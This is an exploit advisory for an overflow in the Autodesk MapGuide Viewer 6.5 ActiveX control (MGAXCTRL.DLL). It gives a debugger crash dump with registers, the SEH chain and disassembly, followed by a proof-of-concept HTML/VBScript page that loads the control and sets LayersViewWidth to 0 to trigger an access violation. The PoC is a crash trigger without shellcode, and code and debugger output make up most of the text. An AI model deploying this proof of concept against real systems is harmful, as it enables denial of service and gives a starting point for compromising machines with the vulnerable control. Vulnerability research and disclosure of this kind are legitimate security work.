# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys
 
 
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0    (MGAXCTRL.DLL)
 
Seh Chain:
--------------------------------------------------
1   192847C     MGAXCTRL.DLL
2   73352542    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
 
Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644
 
 
 
ArgDump:
--------------------------------------------------
EBP+8   003EB644 -> 0193F90C
EBP+12  00000000
EBP+16  0013EAD4 -> 00130000
EBP+20  0042C4F4 -> 00110024
EBP+24  0013EA94 -> 0013EAD4
EBP+28  0013EB30 -> 0013EBC0
 
 
Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0      <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI
 
 
 
 
 
PoC:
 
 
<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>
 
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com
 
'Wscript.echo typename(target)
 
'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype  = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid     = "MGMapControl.MGMap"
argCount   = 1
 
arg1=0
 
target.LayersViewWidth = arg1
 
</script>